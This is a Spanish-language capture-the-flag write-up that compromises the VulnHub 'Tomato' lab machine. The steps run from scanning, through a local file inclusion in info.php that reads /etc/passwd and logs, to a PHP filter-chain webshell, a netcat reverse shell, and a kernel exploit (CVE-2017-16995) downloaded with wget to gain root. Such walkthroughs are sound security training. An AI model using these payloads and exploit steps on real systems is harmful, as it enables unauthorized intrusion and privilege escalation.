VulnHub - Tomato | (Difficulty Easy) - Linux
Writeup de la máquina de dificultad fácil Tomato de la página https://vulnhub.com
Useful Skills
- FTP Enumeration
- Web enumeration
- Local File Inclusion through info.php file
- Internal Port Discovery through LFI (/proc/net/tcp)
- LFI to RCE via PHP filter chain generator
- System Enumeration (Linpeas)
- Linux Kernel < 4.13.9 Ubuntu 16.04 Exploitation (CVE-2017-16995)
Enumeration
TCP Scan
1
2
rustscan -a 192.168.2.139 --ulimit 5000 -g
192.168.2.139 -> [21,2211,80,8888]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
nmap -p21,2211,80,8888 -sCV 192.168.2.139 -oN tcpScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-03 18:26 CET
Nmap scan report for 192.168.2.139
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomato
2211/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
| 256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
|_ 256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
8888/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Private Property
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 00:0C:29:30:C0:ED (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.31 seconds
UDP Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nmap -sU --top-ports 1500 --min-rate 5000 -n -Pn 192.168.2.139 -oN udpScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-03 18:27 CET
Nmap scan report for 192.168.2.139
Host is up (0.00027s latency).
Not shown: 1494 open|filtered udp ports (no-response)
PORT STATE SERVICE
17302/udp closed unknown
18683/udp closed unknown
28476/udp closed unknown
31365/udp closed unknown
32469/udp closed unknown
41702/udp closed unknown
MAC Address: 00:0C:29:30:C0:ED (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
FTP Enumeration
La versión de FTP es vsftpd 3.0.3, busco posibles vulnerabilidades o exploits pero no encuentro nada interesante, por otro lado aunque nmap no me ha reportado anonymous login me intento loguear como anonymous, pero no obtengo nada, por lo que de momento el vector de ataque por FTP concluye
HTTP Enumeration
Whatweb no reporta nada interesante por el puerto 80/TCP
1
2
whatweb http://192.168.2.139
http://192.168.2.139 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.2.139], Title[Tomato]
Accediendo al servicio web en http://192.168.2.139 puedo observar una foto de un tomate
Utilizo gobuster para realizar una enumeración exahustiva de directorios
1
2
3
4
5
6
7
gobuster dir -u http://192.168.2.139 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 100 -q
/.htaccess (Status: 403) [Size: 278]
/antibot_image (Status: 301) [Size: 322] [--> http://192.168.2.139/antibot_image/]
/.hta (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 652]
/server-status (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
Observo un directorio llamado /antibot-image el cual es bastante llamativo, por que el resto de los resultado no llaman mucho la atención, accedo al mismo puediendo observar un directory listing con un directorio llamado antibots
Accedo a /antibots y observo múltiples archivos PHP y directorios, uno de los archivo que capta mi atención es info.php, este archivo es el que permite mostrar información detallada sobre la configuración de PHP en un servidor.
Vulnerability analysis
Local File Inclusion (LFI)
Observo el código fuente de info.php, donde puedo ver un código php comentado, donde a través del parámetro GET image se están incluyendo archivos de la máquina, si este código estuviera descomentado se acontecería la vulnerabilidad LFI, inclusión de archivos locales.
Exploitation
Abusing LFI through info.php file
Pruebo a utilizar el parámetro ?image para incluir por ejemplo el archivo /etc/passwd de la máquina victima, consigo verlo si ningun problema, por lo que me encuentro antes un LFI
Puedo ver dos usuario con /bin/bash, el usuario tomato y el usuario root, intento listar la clave rsa de tomato a través de /home/tomato/.ssh/id_rsa, pero no obtengo nada
Intento listar puertos internos de la máquina a través de /proc/net/tcp donde se muestran todas las conexiones TCP activas en el sistema. Consigo ver los mismos puertos que a través del escaneo nmap.
1
2
3
4
5
6
curl -s -X GET http://192.168.2.139/antibot_image/antibots/info.php/\?image\=/proc/net/tcp | grep "</body></html>" -A 1000 |
sed 's/<\/div><\/body><\/html>//' | awk '{print $2}' | grep -v local_address | cut -d : -f 2 | sort -u |
while read port; do echo "Port -> $((0x$port))";done
Port -> 80
Port -> 2211
Port -> 8888
De cara a realizar una ejecución remota de comandos, podría realizar de tres formas:
- Apache log poisoning
- SSH log poisoning
- PHP filter chain
Para ello debo saber que funciones se encuentran deshabilitadas en el sistema, por lo que filtor por disable_functions en info.php, veo que puedo utilizar system(), shell_exec() entre otras ya que no se encuentran deshabilitadas.
Intento listar los logs de apache2, pero se ve que por permisos de archivos y directorios no he sido capaz, por lo que escalar el LFI a RCE a través de envenenamiento de los logs de apache lo descarto
1
2
3
4
5
6
7
8
9
10
11
curl -s -X GET "http://192.168.2.139/antibot_image/antibots/info.php/?image=/var/log/apache2/access.log" | tail
<p>
This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file: LICENSE
</p>
<p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
</p>
<p>If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license@php.net.
</p>
</td></tr>
</table>
</div></body></html>
Intento listar los logs de SSH, consigo listar los logs sin problema, por lo que ya tengo una vía potencial para escalar el LFI a RCE
1
2
3
4
5
6
7
8
9
10
11
curl -s -X GET "http://192.168.2.139/antibot_image/antibots/info.php/?image=/var/log/auth.log" | tail
Feb 3 12:09:01 ubuntu CRON[1887]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 3 12:09:01 ubuntu CRON[1887]: pam_unix(cron:session): session closed for user root
Feb 3 12:10:01 ubuntu CRON[1939]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 3 12:10:01 ubuntu CRON[1939]: pam_unix(cron:session): session closed for user root
Feb 3 12:15:01 ubuntu CRON[1944]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 3 12:15:01 ubuntu CRON[1944]: pam_unix(cron:session): session closed for user root
Feb 3 12:17:01 ubuntu CRON[1949]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 3 12:17:01 ubuntu CRON[1949]: pam_unix(cron:session): session closed for user root
Feb 3 12:20:01 ubuntu CRON[1952]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 3 12:20:01 ubuntu CRON[1952]: pam_unix(cron:session): session closed for user root
Yo en este caso voy a optar por utilizar la herramienta PHP filter chain generator que permite generar cadenas filter PHP para obtener un RCE sin necesidad de subir un archivo
1
python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>'
Ejecuto el comando id y lo veo interpretado por pantalla, puedo observar que soy el usuario www-data como el que ganaré acceso al sistema
Inicio un listener con netcat por el puerto 4444 para obtener la reverse shell
1
2
nc -lvnp 4444
listening on [any] 4444 ...
Ejecuto la reverse shell y obtengo acceso al sistema como el usuario www-data
1
2
3
4
5
6
7
nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.133] from (UNKNOWN) [192.168.2.139] 60518
bash: cannot set terminal process group (893): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/antibot_image/antibots$ whoami
www-data
Post exploitation
Privilege escalation
Utilizo linpeas para enumerar el sistema, lo primero que detecta es un forma potencial de escalar privilegios a root, a través de la versión del kernel del sistema que se encuentra desactualizada y es vulnerable
Una pequeña busqueda en internet me permite dar con un exploit en C para escalar privilegios
Compilo el exploit y lo transfiero a la máquina victima
1
gcc -static 45010.c -o exploit
1
2
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
1
2
3
4
5
6
www-data@ubuntu:/tmp$ wget http://192.168.2.133/exploit
--2025-02-03 13:05:34-- http://192.168.2.133/exploit
Connecting to 192.168.2.133:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K) [application/octet-stream]
Saving to: 'exploit'
1
www-data@ubuntu:/tmp$ chmod +x exploit
Ejecuto el exploit y escalo mis privilegios a root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
www-data@ubuntu:/tmp$ ./exploit
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035aafc00
[*] Leaking sock struct from ffff880033d7ecc0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff8800350d6b40
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff8800350d6b40
[*] credentials patched, launching shell...
# whoami
root